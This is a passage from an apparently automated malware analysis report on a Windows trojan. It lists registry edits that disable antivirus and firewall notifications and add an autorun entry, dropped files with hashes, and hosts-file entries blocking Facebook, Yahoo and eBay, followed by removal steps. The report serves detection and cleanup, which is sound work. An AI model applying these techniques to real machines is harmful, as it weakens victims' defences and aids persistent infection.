"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 7D A1 48 A5 BF 24 0F 4F A3 A5 99 98 31 92 AA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

The Malware deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process glhljywourzj.exe:2816 makes changes in the system registry.

The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 41 6C 67 D1 9D C6 14 E5 2D 15 28 AC 0E 93 40"

The process glhljywapnzj.exe:4856 makes changes in the system registry.

The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 19 D3 32 5A C4 6A F1 E7 BF 13 F1 E6 36 F5 B0"

The process glhljywapnzj.exe:4708 makes changes in the system registry.

The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 E0 BC B1 90 4E 7C 0A B3 E6 34 89 67 DA CB 48"

The process glhljyvzcczjsznjntrz.exe:2508 makes changes in the system registry.

The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 1F 72 58 BC E7 C1 40 00 46 F5 CA B7 44 76 04"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Presentation Accounts Workstation" = "%System%\unovkkdak.exe"

The process glhljywpp4zj.exe:3992 makes changes in the system registry.

The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "44 59 14 91 20 C0 8B 44 76 E0 CD 66 F7 11 66 9F"

The process glhljyw1jczj.exe:5872 makes changes in the system registry.

The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 97 83 FD 77 F2 98 8D A2 65 5C 26 3B 83 CA 12"

Dropped PE files

MD5	File path
c814feb9e90206f83de6232e76b52e4f	c:\WINDOWS\system32\mqyitew\dropbox\phantomjs197.exe
d583db9137253e0dd45d35c376173e8f	c:\WINDOWS\system32\mqyitew\purple\exefile
d16fb37fb64925e5fcb9c5f7f18f8138	c:\WINDOWS\system32\mqyitew\purple\freebl3.dll
9f95ece3d2b3909de4d9147c4d93f976	c:\WINDOWS\system32\mqyitew\purple\intl.dll
e2ac23418781f632311513944edd0a4c	c:\WINDOWS\system32\mqyitew\purple\libgcc_s_dw2-1.dll
18e88b04da123bf05b07ff60a4e96654	c:\WINDOWS\system32\mqyitew\purple\libglib-2.0-0.dll
b0b2396fc6413016a45a5e8ca2ea8152	c:\WINDOWS\system32\mqyitew\purple\libgmodule-2.0-0.dll
356d697647a480562c4e2e921b13f8ed	c:\WINDOWS\system32\mqyitew\purple\libgobject-2.0-0.dll
7ad6f303082b382bff7bafbab246c61f	c:\WINDOWS\system32\mqyitew\purple\libgthread-2.0-0.dll
158b8d977b663dadbf052dc3ff625db7	c:\WINDOWS\system32\mqyitew\purple\libjabber.dll
7aa32658927457f6bbc917bfed740060	c:\WINDOWS\system32\mqyitew\purple\libnspr4.dll
ff42fa60aeee5b145a495b2dc03d7be5	c:\WINDOWS\system32\mqyitew\purple\libplc4.dll
1167d1b5699ff7f3a3946a714116b604	c:\WINDOWS\system32\mqyitew\purple\libplds4.dll
6a2fae3c859ffb708b592bb4eecb98f5	c:\WINDOWS\system32\mqyitew\purple\libpurple.dll
d7dc3c8976d465a72befaa20d652d0a2	c:\WINDOWS\system32\mqyitew\purple\libsasl.dll
550b3ec2d6a2db0036b4e6e057b54768	c:\WINDOWS\system32\mqyitew\purple\libssp-0.dll
d8daf5ada5cc24d8b0bb4f330e8e83e3	c:\WINDOWS\system32\mqyitew\purple\libxml2-2.dll
9950a16dcb7b6059560310ff4b9c4d8b	c:\WINDOWS\system32\mqyitew\purple\libymsg.dll
0e77713336837ec8946b8a0f0ae117c6	c:\WINDOWS\system32\mqyitew\purple\nss3.dll
3b74e32535fbd58228232f58b924c3fe	c:\WINDOWS\system32\mqyitew\purple\nssutil3.dll
d3766d16190904485e566144ba3214da	c:\WINDOWS\system32\mqyitew\purple\plugins\libxmpp.dll
834d15d762c66a2037a25b0d9c235f09	c:\WINDOWS\system32\mqyitew\purple\plugins\libyahoo.dll
f682806675838619bb12e32a4da5cae2	c:\WINDOWS\system32\mqyitew\purple\plugins\ssl-nss.dll
7e58936c483f06ae1aa81df13d64e031	c:\WINDOWS\system32\mqyitew\purple\plugins\ssl.dll
e67de22684cf17bd99998058a5d5d657	c:\WINDOWS\system32\mqyitew\purple\plugins\statenotify.dll
1a0a90e693490d58d94542bc6a0bfbf2	c:\WINDOWS\system32\mqyitew\purple\plugins\xmppconsole.dll
53da77fb3ba39dd8b4f5d9f6ae082717	c:\WINDOWS\system32\mqyitew\purple\plugins\xmppdisco.dll
2193a40a800170b380fbfc039e593f65	c:\WINDOWS\system32\mqyitew\purple\purple.exe
1a3c18e050ef86cb6d0284f51ecb3e39	c:\WINDOWS\system32\mqyitew\purple\sasl2\saslANONYMOUS.dll
38c529b4daa4293548f6f367ea31d955	c:\WINDOWS\system32\mqyitew\purple\sasl2\saslCRAMMD5.dll
ce06799381174f3524c0893f645dff00	c:\WINDOWS\system32\mqyitew\purple\sasl2\saslDIGESTMD5.dll
12b053c2eccc8285d69323b80ee9ddf1	c:\WINDOWS\system32\mqyitew\purple\sasl2\saslGSSAPI.dll
521492b4ac37fa5a1896eb8ba7b0eaf1	c:\WINDOWS\system32\mqyitew\purple\sasl2\saslLOGIN.dll
6ce549e4c41074a837712dfa041d05ef	c:\WINDOWS\system32\mqyitew\purple\sasl2\saslPLAIN.dll
c04ee77a36b82536269bff437b0cf4e0	c:\WINDOWS\system32\mqyitew\purple\smime3.dll
b1dde425a07484c3d0c8bf4ad0dc1e59	c:\WINDOWS\system32\mqyitew\purple\softokn3.dll
624c05297992577eccaabb0f646b5875	c:\WINDOWS\system32\mqyitew\purple\sqlite3.dll
e64e775bce8695c136feba29e9396d7f	c:\WINDOWS\system32\mqyitew\purple\ssl3.dll
79aef4a7acaeb0e979537a4bc3dcc851	c:\WINDOWS\system32\mqyitew\purple\zip.exe
5ff2481c69e5dd4107c44ab42cc27ba2	c:\WINDOWS\system32\mqyitew\purple\zlib1.dll
fecf803f7d84d4cfa81277298574d6e6	c:\WINDOWS\system32\unzip.exe
1b6d0ba25cd8f682ad75f73915dd7007	c:\WINDOWS\system32\win32mrocli2.exe
3483ee2d23db062524803c9da68d1f83	c:\WINDOWS\system32\win64mroaes2.exe
cb45f631d08bae01a0e50d1e8ee8046d	c:\WINDOWS\system32\win64mrocli2.exe

HOSTS file anomalies

The Malware modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses. The modified file is 804 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1	www.facebook.com
127.0.0.1	facebook.com
127.0.0.1	mail.yahoo.com
127.0.0.1	my.ebay.com
127.0.0.1	cgi.ebay.com
127.0.0.1	offer.ebay.com
127.0.0.1	feedback.ebay.com
127.0.0.1	motors.search.ebay.com
127.0.0.1	search.ebay.com
127.0.0.1	pages.ebay.com
127.0.0.1	pages.motors.ebay.com
127.0.0.1	myworld.ebay.com
127.0.0.1	motors.listings.ebay.com
127.0.0.1	cgi1.ebay.com
127.0.0.1	contact.ebay.com
127.0.0.1	srx.ebaymotors.ebayrtm.com
127.0.0.1	motors.shop.ebay.com
127.0.0.1	forums.ebay.com
127.0.0.1	answercenter.ebay.com
127.0.0.1	shop.ebay.com
127.0.0.1	ocs.ebay.com
127.0.0.1	cschatlb-na.corp.ebay.com
127.0.0.1	cschat1-na.corp.ebay.com
127.0.0.1	cschat.ebay.com
127.0.0.1	helpdesk.corp.ebay.com
127.0.0.1	qu.corp.ebay.com
127.0.0.1	www.ebay.com

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
win32mrocli2.exe:428
%original file name%.exe:1256
purple.exe:2604
unzip.exe:2576
unzip.exe:6116
unovkkdak.exe:4740
unovkkdak.exe:3644
eityzygishyx.exe:564
eityzygishyx.exe:4936
glhljywourzj.exe:2816
glhljywapnzj.exe:4856
glhljywapnzj.exe:4708
glhljyvzcczjsznjntrz.exe:2508
glhljywpp4zj.exe:3992
glhljyw1jczj.exe:5872
Delete the original Malware file.
Delete or disinfect the following files created/modified by the Malware:
%Documents and Settings%\%current user%\Local Settings\Temp\glhljyvzcczjsznjntrz.exe (3883 bytes)
%System%\mqyitew\tst (10 bytes)
C:\dev\null\icons\24e5b564d56b4d1796b0dc4344959e47b69727e2.jpg.save (5 bytes)
C:\dev\null\icons\44fc67967f917b10ff19f38897c1bbd2d6ff2e35.jpg.save (5 bytes)
C:\dev\null\icons\583b4a20a047387492f6d590b5b9dde3f21c37fb.jpg.save (5 bytes)
C:\dev\null\icons\a8666123c3b28dcc219d1b77977b6b117925151b.jpg.save (5 bytes)
C:\dev\null\icons\38b72e51556edcd947566844b29968c385bfbc8b.jpg.save (5 bytes)
C:\dev\null\icons\245845f77a47c462b516fe16a04f4c2bca53f2af.jpg.save (5 bytes)
C:\dev\null\icons\b5e697d54a2a949708cb36ca28de44e15d94b77e.jpg.save (5 bytes)
C:\dev\null\icons\9235f133902a2e5a8c903257f30a33a9081eabc3.jpg.save (5 bytes)
C:\dev\null\icons\c11fa36622ea7c9801e8a7f1f8edbb090710860c.jpg.save (5 bytes)
C:\dev\null\icons\6f5c34656ae889d3a4be5752bac2ba158d914d30.jpg.save (5 bytes)
C:\dev\null\icons\d94f5c277f5a1bde18e7fb091adf4a691c0899e5.jpg.save (5 bytes)
C:\dev\null\icons\b688b8627d9ad1860fdd92f5b945854c0296c84e.jpg.save (5 bytes)
C:\dev\null\icons\666817ac7e958c3f00849b37a7331edb26e145ec.jpg.save (5 bytes)
C:\dev\null\icons\bd04b63ac46de0e663dbe85fde1c7e47ce3ff7f1.jpg.save (5 bytes)
C:\dev\null\icons\b76dbec37693329ba77eb18e79b39fb5fbf3054d.jpg.save (5 bytes)
C:\dev\null\icons\e6f6bbd5fafb7ff340f15ff6b3abc8caf850e315.jpg.save (5 bytes)
C:\dev\null\icons\d0c441ce203a51a3bae938018df3e5008a410d30.jpg.save (5 bytes)
C:\dev\null\icons\11e318a152e6529bbc35d7d9162e9c9aadad2ef0.jpg.save (5 bytes)
C:\dev\null\icons\3b76e70d5ed8690323495fb5524d677b5c609400.jpg.save (5 bytes)
C:\dev\null\icons\4553ab0ce0319aba787e20b0d556851615ccbb70.jpg.save (5 bytes)
C:\dev\null\icons\15e6a4765f6b8cce43698383bb17cfd498e02a0b.jpg.save (5 bytes)
C:\dev\null\icons\eaf0d8fd1743714599baf123924e6d3ac059156e.jpg.save (5 bytes)
C:\dev\null\icons\e341afabfc4d58e582d78a533eddb486d2f30ffc.jpg.save (5 bytes)
C:\dev\null\icons\8506be1381a997df1dc523e7b482ec01f38a4379.jpg.save (5 bytes)
C:\dev\null\icons\2c423a99e263dc28037c9fc1e8e84832ab2de9e3.jpg.save (5 bytes)
C:\dev\null\icons\5f210f8347bcd25e6f25ecc6247a7289a1d4f55c.jpg.save (5 bytes)
C:\dev\null\icons\25362109a4500f4c90538040e1231fcc629b3c8d.jpg.save (5 bytes)
C:\dev\null\icons\3da8e0656812f00e88ee3778e7770a849087c87b.jpg.save (5 bytes)
C:\dev\null\icons\2773de6db6f0bf389a1894aad4acf386d408f494.jpg.save (5 bytes)
C:\dev\null\icons\48b91aab153f9ffe7879a1cc6d89bbe6e083f7a0.jpg.save (5 bytes)
C:\dev\null\icons\913bc246c1791e69842270061dd6d042960dc94d.jpg.save (5 bytes)
C:\dev\null\icons\3784219f65e8d4e36cd26cde04e8821f423197e1.jpg.save (5 bytes)
C:\dev\null\icons\eaab6294c2c71677224bacb89dc712dcfaf5855e.jpg.save (5 bytes)
C:\dev\null\icons\301fc70c8fbd2a3017832c5c169bf2d324f3da7e.jpg.save (5 bytes)
C:\dev\null\icons\6d035cbf152f2f323826bc48cc9ed6edee5a5610.jpg.save (5 bytes)
C:\dev\null\icons\2d5f2725aeeb39d2b73fba914d1eaa5024119005.jpg.save (5 bytes)
C:\dev\null\icons\69a339461c86da40f494ed26abc1d12ff1f4fab5.jpg.save (5 bytes)
C:\dev\null\icons\63c0dab3c8b04b979ff8f4a9f29bd2286abc8c2c.jpg.save (5 bytes)
C:\dev\null\icons\277550b871fd84f39688ce0ae7e82f34d78f5db7.jpg.save (5 bytes)
C:\dev\null\icons\8aa806930ad4ca4a5ec3427c5796fbe91ee71f22.jpg.save (5 bytes)
C:\dev\null\icons\fec20686ac06dfd471656ea58f759f8ad50252b6.jpg.save (5 bytes)
C:\dev\null\icons\ca839c923b09a03377ccb1ff62af53ce474c9f76.jpg.save (5 bytes)
C:\dev\null\icons\152b17fd93e6588aae66c35eac8b90ceae152474.jpg.save (5 bytes)
C:\dev\null\icons\8a5ecd76a959529f6edfa0bc3d746f226de3cc1c.jpg.save (5 bytes)
C:\dev\null\icons\c626735a7764616e285ab8651240ddf7c227deff.jpg.save (5 bytes)
C:\dev\null\icons\d09c11dea18d4f26421157d9817b6a78333d421d.jpg.save (5 bytes)
C:\dev\null\icons\7a037474380e10e4114d34df27c7f719750f26b6.jpg.save (5 bytes)
C:\dev\null\icons\badeaad5b386acf782d712f79c2eaede1898fe8f.jpg.save (5 bytes)
C:\dev\null\icons\f92d9cd8314e6fd1ad6eac6baecb696abea59469.jpg.save (5 bytes)
C:\dev\null\icons\6c2add77cd1b32e41657342a1aa9c844bd68acd5.jpg.save (5 bytes)
C:\dev\null\accounts.xml.save (146 bytes)
C:\dev\null\icons\61bd633e8348cd7cda6332f0091b364fd1304228.jpg.save (5 bytes)
C:\dev\null\icons\41b3ad01aeabfff74efb3c00f8a6ef3c64d31f68.jpg.save (5 bytes)
C:\dev\null\icons\a51994902670d9aa461d0bcaf28104b8ff6d5f59.jpg.save (5 bytes)
C:\dev\null\icons\d5da8b1fd7bd631465419dbbce8358dfa2cb4abb.jpg.save (5 bytes)
C:\dev\null\icons\669ffde9f8d3aab3b99868ed8305d5251acf568b.jpg.save (5 bytes)
C:\dev\null\icons\59d0afc10817f666da61599f4ebae157b71b282a.jpg.save (5 bytes)
C:\dev\null\icons\6e8e61003aa3ea022af6aa587fa86776d3110c19.jpg.save (5 bytes)
C:\dev\null\icons\0629957ac0ac3c0984da13d12c9400ebdb01a4b2.jpg.save (5 bytes)
C:\dev\null\icons\23b81f9bc63ab275622657cd877dd9db2fbe451b.jpg.save (5 bytes)
C:\dev\null\icons\e27f4a709a4b91cd310cc12839c97b599d04443b.jpg.save (5 bytes)
C:\dev\null\icons\f0d7fdd2430fe14fe3b9936a81ecad86cc3b0d23.jpg.save (5 bytes)
C:\dev\null\icons\f2cc26fa05bcef7f833e02fde24fd44a5574e012.jpg.save (5 bytes)
C:\dev\null\status.xml.save (551 bytes)
C:\dev\null\icons\e6ba4580705b7614e6fc310ca2749c2c59557807.jpg.save (5 bytes)
C:\dev\null\icons\f95c1c6eb5593c9cb5589d267df1657a3d18cdc8.jpg.save (5 bytes)
C:\dev\null\icons\005fbc4b3cb146c8098badbc3e3c5c4516a2b2a0.jpg.save (5 bytes)
C:\dev\null\icons\3176e5c56e4007d4cec15d3e5ee7b3c05fc9d821.jpg.save (5 bytes)
C:\dev\null\icons\a797b30b4a519f36a19f4efcb662b555a42b77a9.jpg.save (5 bytes)
C:\dev\null\icons\1c197f09c6aa1ebc5f130a8cf5cc0721e8274160.jpg.save (5 bytes)
C:\dev\null\icons\7aaa0c3cef3bc52936bbf26f69d122a8531a4fdc.jpg.save (5 bytes)
C:\dev\null\icons\1d060cc267b0bdee1db9bf7e3b70db40fb2a1d1d.jpg.save (5 bytes)
C:\dev\null\icons\b85e74b2e16b150fc74c04bea72846d5ba861120.jpg.save (5 bytes)
C:\dev\null\icons\c51f62632c285d604506115f2488a8c529d86fff.jpg.save (5 bytes)
C:\dev\null\icons\d0043e0612cc62d10f3e56ff5605b97151fba2e2.jpg.save (5 bytes)
C:\dev\null\icons\c447baccbb86131f8b7f06455e5f784e7406875c.jpg.save (5 bytes)
C:\dev\null\icons\6f7a8a326b4d3ef245fab3019e730495bfa4b3ff.jpg.save (5 bytes)
C:\dev\null\icons\50ab434275cfb714e30f4ae6807d2d48e901f456.jpg.save (5 bytes)
C:\dev\null\icons\fcc65c34ab46530603387dc2b0cf203986424778.jpg.save (5 bytes)
C:\dev\null\icons\f86c0968b55852aff6fdb8134b83348477d205db.jpg.save (5 bytes)
C:\dev\null\icons\4806483986e60cad969a1707422a715d42f62161.jpg.save (5 bytes)
C:\dev\null\icons\e864caf001491035549485ec0ab163423e69da96.jpg.save (5 bytes)
C:\dev\null\icons\144ae9548d5b8c728a7d193cbad0e82270db5f59.jpg.save (5 bytes)
C:\dev\null\icons\73e1fa4cea1e684f9668a17985d5b3dab2447835.jpg.save (5 bytes)
C:\dev\null\icons\0aa6c2e449161c0e0f99b36cea819d0558926a91.jpg.save (5 bytes)
C:\dev\null\icons\b15a27be277dab59ec28552586bb2dd6ca6ccee7.jpg.save (5 bytes)
C:\dev\null\icons\e9adfad40f833f7762653ec212ec103c9f600f39.jpg.save (5 bytes)
C:\dev\null\icons\ab57c70dc1e997465b1a9b3211788914b7a19e96.jpg.save (5 bytes)
C:\dev\null\icons\c44004785c10a859dabfb2c9367cae0ffb703bf7.jpg.save (5 bytes)
C:\dev\null\icons\672f241bea6963a36dd5695b5fe3f4629376c0da.jpg.save (5 bytes)
C:\dev\null\icons\d6056b785ebc7f8b537ff356fd1ddcac0110bb1b.jpg.save (5 bytes)
C:\dev\null\icons\8c05df51218481539fe6057b6d3b389910492221.jpg.save (5 bytes)
C:\dev\null\icons\252a56b4ea1b746fcfee080190c17ea3427d84ab.jpg.save (5 bytes)
C:\dev\null\icons\485071ec7068eb6f1d0e5bea1128578b2c269adb.jpg.save (5 bytes)
C:\dev\null\icons\568310ec88a22903677e41668bf713d42201a7e3.jpg.save (5 bytes)
C:\dev\null\icons\bc44b5c3afd27ce45f8d3ff33a8ff00a67aa7be4.jpg.save (5 bytes)
C:\dev\null\icons\35c8f63338d1d8b3e105821ff6c073bc7e32c64b.jpg.save (5 bytes)
C:\dev\null\icons\bded82350b81a88f29535b3d2ff7f1d3174d0f62.jpg.save (5 bytes)
C:\dev\null\icons\6238f7b1beda6f61518a73109b44b1b4850cb076.jpg.save (5 bytes)
C:\dev\null\icons\4de41723633eaee5dbfdd3b81ab99d893ad5af5e.jpg.save (5 bytes)
C:\dev\null\icons\4c5abdf6fc4709a31250ed9282231dd73e53cb78.jpg.save (5 bytes)
C:\dev\null\icons\4c0acdeac39c421dfc981f9b5c3772ba7afef119.jpg.save (5 bytes)
C:\dev\null\certificates\x509\tls_peers\chat.facebook.com.save (5 bytes)
C:\dev\null\icons\1de34f64317b2abc9608e23df1dd6effb39a4d2d.jpg.save (5 bytes)
C:\dev\null\icons\b621750e66296ac0ea0dd7e7e50be53052cf1471.jpg.save (5 bytes)
C:\dev\null\icons\4fee2f853ee309b79a35c76650633a0ba58525b6.jpg.save (5 bytes)
C:\dev\null\icons\dab66afc9f14e3adb4b64533857fdd9c5d33cd0f.jpg.save (5 bytes)
C:\dev\null\icons\ac421f7a9c547c27c45627d1558c728621ab5df2.jpg.save (5 bytes)
C:\dev\null\icons\42fdc32270a1fd5a75143f4dd1556f2e96f74e7e.jpg.save (5 bytes)
C:\dev\null\icons\feb5bbd7f1ec2e48aa8bd9850279953f3cb8ff15.jpg.save (5 bytes)
C:\dev\null\icons\6b756679fda59cc6d3d320331e2e807e2e8034c4.jpg.save (5 bytes)
C:\dev\null\icons\2657185809fd100acc7077ef5ee905ed203b6bd2.jpg.save (5 bytes)
C:\dev\null\icons\b51bc5756e0f731155ee5826c634b66f611869be.jpg.save (5 bytes)
C:\dev\null\icons\d5da23a964bb94cdf1e0a47958c2e3e28274188a.jpg.save (5 bytes)
C:\dev\null\prefs.xml.save (7 bytes)
C:\dev\null\icons\3e63dcb89b4bc7d919bef1ef173908160712d926.jpg.save (5 bytes)
C:\dev\null\icons\0c9c6d01b7a9d095ccfcd1be369a914a09a4d6ca.jpg.save (5 bytes)
C:\dev\null\icons\71c42a9b04d4a6da914f77d0b0d6159dfc908582.jpg.save (5 bytes)
C:\dev\null\icons\a3d9268f0017c757b0fd28b53330fa36c49f2922.jpg.save (5 bytes)
C:\dev\null\icons\1d8a79b8deb9b1da5151f84490811142a3b33821.jpg.save (5 bytes)
C:\dev\null\icons\e72f15737758a50dc5b32ea4814411d9cf9c5454.jpg.save (5 bytes)
C:\dev\null\icons\f198472c67b151b158fb3dc895b69b66a9f72cdc.jpg.save (5 bytes)
C:\dev\null\icons\af79198bd964f03af2cf2dba4501d0750222d39c.jpg.save (5 bytes)
C:\dev\null\icons\3e017c5887de83134844c5987061bf0b59dd1fac.jpg.save (5 bytes)
C:\dev\null\icons\2bb6cad6d70c366fc0f207c411de48be190aafd3.jpg.save (5 bytes)
C:\dev\null\icons\bffa03620c634a5072f35a696bde7b15e1be170d.jpg.save (5 bytes)
C:\dev\null\icons\b1aa85b50bc38e97e673896a151287a5cc173d1d.jpg.save (5 bytes)
C:\dev\null\icons\7a367f364e432fea2fda687e66b21fe765938c9b.jpg.save (5 bytes)
C:\dev\null\icons\2662e11f4c739960de346f1b4a2ed159d5e2ab63.jpg.save (5 bytes)
C:\dev\null\icons\9e6c49c2ab23a89ea699f598a8c2539a2ce64c8c.jpg.save (5 bytes)
C:\dev\null\icons\3220b53edceccc88455498a6044922043fca8ad0.jpg.save (5 bytes)
C:\dev\null\icons\80105ce1d710b5e8db09b7979e2bdf81d129dd4a.jpg.save (5 bytes)
C:\dev\null\icons\395523545d38ccdf1bab7e03c8b5f3973c465f4d.jpg.save (5 bytes)
C:\dev\null\icons\fd5de0b5b5bc0c9db46898396c7c181cb5ed27dd.jpg.save (5 bytes)
C:\dev\null\icons\3c0120a98c4d6ae8d19fd4946c9addba294623a3.jpg.save (5 bytes)
C:\dev\null\icons\491ef8c5b8a22eeaa4a6c764f58a82b572063458.jpg.save (5 bytes)
C:\dev\null\icons\fda508ec035ed8be377a4e2d47d86c62d470c56d.jpg.save (5 bytes)
C:\dev\null\icons\ab0d22e02b11e53efe3533b906f55f612c933a64.jpg.save (5 bytes)
C:\dev\null\icons\31343e6619f34d02e94bef801548cf2a2e5058e4.jpg.save (5 bytes)
C:\dev\null\icons\1b58d9794274c7d75a1f0c8544ff7aa0e33256a0.jpg.save (5 bytes)
C:\dev\null\icons\2eaed5d088ced02f68e9e8db0755425b720c06a2.jpg.save (5 bytes)
C:\dev\null\icons\448dd396dac3de51a031b53270a89860afbe2508.jpg.save (5 bytes)
C:\dev\null\icons\70b8caba98bc624353433293dec0ca0d9dec5761.jpg.save (5 bytes)
C:\dev\null\icons\1ba35261202e2f87d9c312fbd792c55f662b8819.jpg.save (5 bytes)
C:\dev\null\icons\ebcb620b4604a59882f68714f2f32f11e42eeb5d.jpg.save (5 bytes)
C:\dev\null\icons\f75ecd3b906820a93d1cab5eddc3a89f7a2656b3.jpg.save (5 bytes)
C:\dev\null\icons\341afa921fc8402bd996cb690276976ed8acb5de.jpg.save (5 bytes)
C:\dev\null\icons\b98c1dcd1c8eb63e0557335f3ceb63d3e37e86a0.jpg.save (5 bytes)
C:\dev\null\icons\9f30caf38edc13cf99865a136b1d8a924983e9ab.jpg.save (5 bytes)
C:\dev\null\icons\92c02ea9a72036e3d437c6e1ea5e49ba0f467178.jpg.save (5 bytes)
C:\dev\null\icons\640c645551a704c54eff18836b7eae8ee0da0975.jpg.save (5 bytes)
C:\dev\null\icons\33ac15b05076bdc29117a7e7e072364626bcb7d5.jpg.save (5 bytes)
C:\dev\null\icons\dab069465fa334a7dbf839bc1b41e86e78ab97a0.jpg.save (5 bytes)
C:\dev\null\icons\4b870ba980703bb14fceb9f0970c66a97433060e.jpg.save (5 bytes)
C:\dev\null\icons\8b1a6971a8965fa993cbbe9f82a75322ccbdf3e7.jpg.save (5 bytes)
C:\dev\null\icons\18199163eecf1b7312ebcacd2ba8828cf04e2d27.jpg.save (5 bytes)
C:\dev\null\icons\2c8b0c86518a24fef9f6cf169713769d07fc4a47.jpg.save (5 bytes)
C:\dev\null\icons\d2b14958b1c462c9a453bd55d58413e1fa7506f8.jpg.save (5 bytes)
C:\dev\null\icons\8981eeb38add7f1fb59159d8cd14a69bfde94add.jpg.save (5 bytes)
C:\dev\null\icons\bdc26f85f6f911c631eb430af63385e92f7e63cc.jpg.save (5 bytes)
C:\dev\null\icons\17e83ae90356598435c2b10f836eb38d81c68b97.jpg.save (5 bytes)
C:\dev\null\icons\83a02ccc9667e6de04d506e1943699dae7038ffc.jpg.save (5 bytes)
C:\dev\null\icons\3d2e363d935d1dbb5dda889958207316d899bd2b.jpg.save (5 bytes)
C:\dev\null\icons\c6b99d22efe0c3d8b6975491077d1cf045aa35a2.jpg.save (5 bytes)
C:\dev\null\icons\2f26a8a25c51902edbe0b30f5ff669fd8ce47b6f.jpg.save (5 bytes)
C:\dev\null\icons\ef672920e507926187f15453894c8e65eb57a6e2.jpg.save (5 bytes)
C:\dev\null\icons\df706e4466ff63060bfe2817e250cb182458532c.jpg.save (5 bytes)
C:\dev\null\icons\06786df37768a4b1442258546b1cc8a25b9c1002.jpg.save (5 bytes)
C:\dev\null\icons\b060fb7221dbe24840e631a53de9c0c0b10b0307.jpg.save (5 bytes)
C:\dev\null\icons\1c697641b354de15eacffed0bd38c7287eb1da96.jpg.save (5 bytes)
%System%\mqyitew\purple\nssutil3.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\AddTrust_External_Root.pem (1 bytes)
%System%\mqyitew\purple\libpurple.dll (5873 bytes)
%System%\mqyitew\purple\ssl3.dll (1281 bytes)
%System%\mqyitew\purple\intl.dll (601 bytes)
%System%\mqyitew\purple\purple.exe (26 bytes)
%System%\mqyitew\purple\libnspr4.dll (1281 bytes)
%System%\mqyitew\purple\smime3.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\Entrust.net_2048.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Verisign_Class3_Primary_CA.pem (834 bytes)
%System%\mqyitew\purple\ca-certs\Microsoft_Internet_Authority_2010.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\ValiCert_Class_2_VA.pem (1 bytes)
%System%\mqyitew\purple\plugins\xmppdisco.dll (44 bytes)
%System%\mqyitew\purple\sqlite3.dll (3073 bytes)
%System%\mqyitew\purple\plugins\libyahoo.dll (22 bytes)
%System%\mqyitew\purple\plugins\xmppconsole.dll (37 bytes)
%System%\mqyitew\purple\ca-certs\Entrust.net_Secure_Server_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Microsoft_Secure_Server_Authority_2010.pem (2 bytes)
%System%\mqyitew\purple\sasl2\saslGSSAPI.dll (36 bytes)
%System%\mqyitew\purple\libgobject-2.0-0.dll (2105 bytes)
%System%\mqyitew\purple\ca-certs\StartCom_Certification_Authority.pem (2 bytes)
